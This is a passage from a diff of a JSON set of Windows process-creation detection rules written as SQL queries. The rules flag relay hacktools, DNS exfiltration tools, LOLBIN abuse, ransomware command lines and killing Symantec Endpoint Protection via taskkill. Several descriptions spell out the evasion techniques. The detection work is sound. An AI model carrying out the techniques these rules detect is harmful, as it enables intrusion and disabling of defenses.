(Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Administrative scripts." + "Legitimate use for tracing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexec_execution.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Potential Discovery Activity Via Dnscmd.EXE", - "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", - "status": "experimental", - "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", - "author": "@gott_cyber", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1543.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate administration use" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dnscmd_discovery.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Gpresult Display Group Policy Information", - "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", - "author": "frack113", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpresult_execution.yml" + "filename": "proc_creation_win_powershell_add_windows_capability.yml" }, { - "title": "Remote Access Tool - NetSupport Execution From Unusual Location", - "id": "37e8d358-6408-4853-82f4-98333fca7014", + "title": "Use of FSharp Interpreters", + "id": "b96b2031-7c17-4473-afe7-a30ce714db29", "status": "experimental", - "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a software developer." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR NewProcessName LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "title": "Using AppVLP To Circumvent ASR File Path Rule", + "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "status": "experimental", + "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", + "author": "Sreeman", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_lolbin_appvlp.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "Potential SMB Relay Attack Tool Execution", + "id": "5589ab4f-a767-433c-961d-c91f3f704db1", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate files with these rare hacktool names" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", + "title": "HackTool - winPEAS Execution", + "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "author": "Georg Lauenstein (sure[secure])", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" }, { - "title": "Suspicious Process Start Locations", - "id": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "status": "experimental", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Use of OpenConsole", + "id": "814c95cc-8192-4378-a70a-f1aafd877af1", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrator" + "Legitimate use by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_openconsole.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone 